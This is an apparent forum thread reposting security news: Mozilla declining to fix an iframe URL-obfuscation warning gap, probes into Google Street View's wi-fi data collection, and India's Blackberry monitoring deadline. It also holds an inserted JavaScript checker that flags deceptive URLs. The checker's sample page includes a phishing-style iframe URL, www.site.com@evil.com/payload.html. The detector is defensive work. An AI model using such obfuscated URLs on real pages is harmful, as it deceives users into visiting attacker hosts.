  20. Mozilla announced that it doesn't plan to fix an alleged bug disclosed recently regarding Firefox not triggering a warning when a particular obfuscation technique is used for URLs loaded in IFrames. Two days ago a security researcher from Web security solutions vendor Armorize Technologies, named Aditya K Sood, revealed in a post on the company's blog what he called a "Mozilla Firefox Bug." The issue described by Sood refers to the way Firefox handles certain obfuscated URLs in IFrames. Whenever a URL of the form www.site.com@evil.com is loaded in the address bar, the browser prompts a confirmation dialog, letting the user know that the website they are accessing is evil.com and not site.com. This simple obfuscation technique was commonly used in social engineering attacks, like phishing, a few years ago, prompting Mozilla to introduce the warning. The Armorize researcher points out that this behavior also doesn't apply when URLs are loaded inside IFrames and according to him "In certain cases, it can be used effectively in spreading malware and stealing sensitive information." However, Mozilla and other security experts disagree. "We are aware of the discussion. There is currently no fix in plan since Mozilla does not believe this can be used to attack users," Johnathan Nightingale, director of Firefox development, announced on the Mozilla Security blog. The argument is that users do not actually see the URLs loaded in IFrames, unless explicitly looking at the source code of the page. Therefore, there is no reason for an attacker to load the obfuscated something.com@evil.com instead of loading evil.com directly. "Aditya's complaint in the aforementioned bug is very simple, and boils down to the observation that Firefox employs this warning only for the top-level document - but does not apply this logic to subresources such as IFRAMEs. If you think about it for five seconds or so, it's painfully evident why: there is simply no need to do so. 
"The URLs of these subresources are never displayed in the address bar, and therefore, there is no opportunity to confuse the user in any way. There is no reasonable attack scenario where this would matter," writes Michal Zalewski, a security engineer at Google, who takes issue with several media sites that reported this as a bug in Firefox. Mozilla Will Not Fix IFrame URL Obfuscation Pseudo-Bug - Softpedia
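Added example, not part of the post above or of any Mozilla or Armorize code: it shows how a URL of the form www.site.com@evil.com is actually parsed (the part before the @ is userinfo, the real host is evil.com), which is why the address-bar warning exists, and a small checker that flags such URLs whether they are the top-level location or an iframe src, so a page scanner can report them regardless of whether the browser would warn. The sample page and the evil.com / site.com names are constructed from the post's own example.

```javascript
// Parse a URL with the WHATWG URL class (global in Node and browsers) and
// report where a browser will really connect. For "http://www.site.com@evil.com"
// the hostname is evil.com and "www.site.com" is just the username component.
function describeUrl(raw) {
  const u = new URL(raw);
  return {
    input: raw,
    realHost: u.hostname,            // host the browser connects to
    userinfo: u.username,            // text before the "@", sent as a credential
    // Hostname-like userinfo (contains a dot) is the classic phishing trick.
    deceptive: u.username.includes('.'),
  };
}

// Pull <iframe src="..."> values out of a page body. A plain regex is enough
// for this illustration; a real scanner would use an HTML parser.
function iframeSources(html) {
  const out = [];
  const re = /<iframe\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Flag every candidate URL (top-level document plus iframe subresources)
// whose userinfo looks like a hostname. Unlike Firefox's warning, this check
// does not care whether the URL would ever be shown in the address bar.
function findObfuscatedUrls(topLevelUrl, html) {
  const candidates = [topLevelUrl, ...iframeSources(html)];
  return candidates.map(describeUrl).filter(d => d.deceptive);
}

// Constructed sample page: one ordinary iframe and one using the trick.
const samplePage = `
<html><body>
<iframe src="http://ads.site.com/banner.html"></iframe>
<iframe src="http://www.site.com@evil.com/payload.html"></iframe>
</body></html>`;

// Run the checker on the sample; prints the single flagged iframe URL.
const report = findObfuscatedUrls('http://site.com/page', samplePage);
console.log(describeUrl('http://www.site.com@evil.com'));
console.log(report);
```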
  21. Why did they give you a warning? Because you can keep these conversations (the swearing) nicely on Messenger or via PM. It's a matter of etiquette. Krisler annoys me too with his questions, but that doesn't mean I start making a scene.
  22. Neme had made a dedicated topic for this: http://rstcenter.com/forum/24670-invitatii-filelist-invitatie-demonoid-invitatie-lasttorrents-invitatii-trackere.rst
  23. He has a thread tied to his left ear for the first cigarette.
  24. Spain has become the latest country to launch an investigation into the collection of sensitive wi-fi data by Google. Google has admitted that its Street View cars had "accidentally" collected data from unsecured wi-fi networks in more than 30 countries. A Google representative has now been summoned to appear before a judge in Madrid on 4 October. It is in response to a complaint by a privacy watchdog called Apedanica. The Google representative has been summoned to explain what data was collected, how it was obtained and the number of people affected. "We are working with the authorities in Spain to answer any questions they have," said a spokesperson for Google. "Our ultimate objective is to delete the data consistent with our legal obligations and in consultation with the appropriate authorities." Investigations are ongoing in France, Germany and Australia. In the US, Google faces a class action lawsuit over the data harvesting, as well as a large scale investigation backed by 38 states. In the UK, the Information Commissioner (ICO) recently cleared the company after it found that it had not collected "significant" personal details. However, the firm is still under investigation by the Metropolitan police. All of the probes were prompted by Google's admission that its Street View cars "accidentally" collected data from unsecured wi-fi networks over a period of four years. The error has been blamed on a chunk of unsanctioned rogue code used in the cars. It came to light following a request by data protection authorities in Hamburg, Germany, for more information about the operation of the service.
  25. India has sent formal notices to the country's mobile operators telling them they must have equipment to monitor Blackberry services by 31 August. The move will increase pressure on Blackberry maker Research in Motion (RIM) to allow Indian security agencies access to encrypted messages. Tata Teleservices told BBC News that the letter said it must "ensure that Legal Intervention (LI) capability is put in place" by the end of the month. RIM said it grants "lawful" access. A spokesperson for Tata Teleservices said: "As a Tata Group company, we have always abided by the law of the land and will do so here too". Other operators have confirmed that they received a similar request. 'Terrorism threat' The government has said it will shut down Blackberry services if the firm does not meet its demands to give access to its encrypted messenger and e-mail services by 31 August. In a statement released on 12 August, the government said that other Blackberry services, including voice and SMS traffic, were already "available to law enforcement agencies". India, along with many other countries, believes the device and the Blackberry infrastructure are a threat to national security. Blackberry handsets automatically scramble messages and send them to servers in Canada and other countries. Authorities have said they want access to these messages and the keys to decrypt them to counter terrorism and criminal activity. The row in India is the latest in a long-running dispute between RIM and international governments. The United Arab Emirates was the first country to propose a block on the devices, followed by a raft of others including Lebanon, Algeria, Saudi Arabia and Kuwait. A ban that was supposed to come into force on 6 August in Saudi Arabia has been postponed whilst the government holds talks with RIM. 'Co-operative' company The company is also reportedly in talks with the Indian government. 
However, government officials contacted by BBC News declined to confirm reports that RIM would grant limited access to BlackBerry instant messages by 1 September. It also declined to confirm that it had promised talks on monitoring its more secure corporate e-mail services. RIM said it stood by a statement issued last week that said it "cannot disclose confidential regulatory discussions that take place with any government". "RIM assures its customers that it genuinely tries to be as co-operative as possible with governments in the spirit of supporting legal and national security requirements, while also preserving the lawful needs of citizens and corporations," the statement read. BBC News - India sets Blackberry monitoring deadline